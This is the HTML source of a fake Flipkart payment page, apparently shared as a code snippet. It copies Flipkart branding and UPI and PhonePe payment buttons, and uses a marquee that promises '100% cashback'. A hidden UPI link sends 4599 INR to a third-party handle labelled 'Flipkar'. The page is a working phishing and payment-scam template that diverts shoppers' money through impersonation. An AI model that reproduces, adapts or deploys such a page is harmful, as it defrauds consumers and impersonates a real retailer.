3 years ago in HTML
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<title>Flipkart - Payment PAGE</title>
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<td><a href='../'> <img src="https://i.imgur.com/wfgiseR.jpg" width="100%"> </a> </td>
<center><h2>Payment Option</h2></center>
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<td> <div class="paybutton"><a href="./1-3.html"> <img src="https://img.etimg.com/thumb/width-640,height-480,imgsize-156691,resizemode-1,msid-68163942/phonepe-partners-with-walmart-to-help-customers-pay-via-the-app-at-best-price-stores.jpg"></a> </div>
<div class="paybutton" style="display:block;"><a href="./2-3.html" width="9%"> <img src="https://www.fresherslive.com/assets-images/news/origin/2020/05/01/need-to-know-how-to-change-the-upi-pin-on-phone-through-payment-apps-like-googlepay-phonepe-and-paytm-here-is-the-step-by-step-method.jpg" style="
margin-top: 26px;
"></a> </div><div class="paybutton" style="display: none;" onclick="showImg()">
<img src="https://cdn.iconscout.com/icon/premium/png-512-thumb/qr-code-scan-4-991622.png" style="
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"><span class="teeeexxtttt">
UPI Scan and Pay</span> </div></td>
<table border="0" width="100%" bgcolor="#2873F0" class="card">
<td><marquee>Pay via Phonepe and get 100% cashback by flipkart. Get 100% cashback and Enjoy ! . </marquee>
<td style="display: none;"> <a href=upi://pay?pa=sagpay1@ybl&pn=Flipkar&cu=INR&am=4599 width="100%" class="w3-btn w3-white w3-border w3-border-red w3-round-large">Paytm / Google Pay</a></td>
<center><img id="map_img" src="qr/qr2999.jpg" style="display: none;" width="200" height="200" /></center>
<center><input type="hidden" class="w3-btn w3-white w3-border w3-border-red w3-round-large" id="Map" value="Scan & Pay" onclick="showImg()"/></center>
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<table id="customers">
<td>Price (1 item)</td>
<td>Delivery Charges</td>
<td>Amount Payble</td>
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<td> <img src="https://i.imgur.com/aIrIu2Z.jpg" width="100%"> </td>
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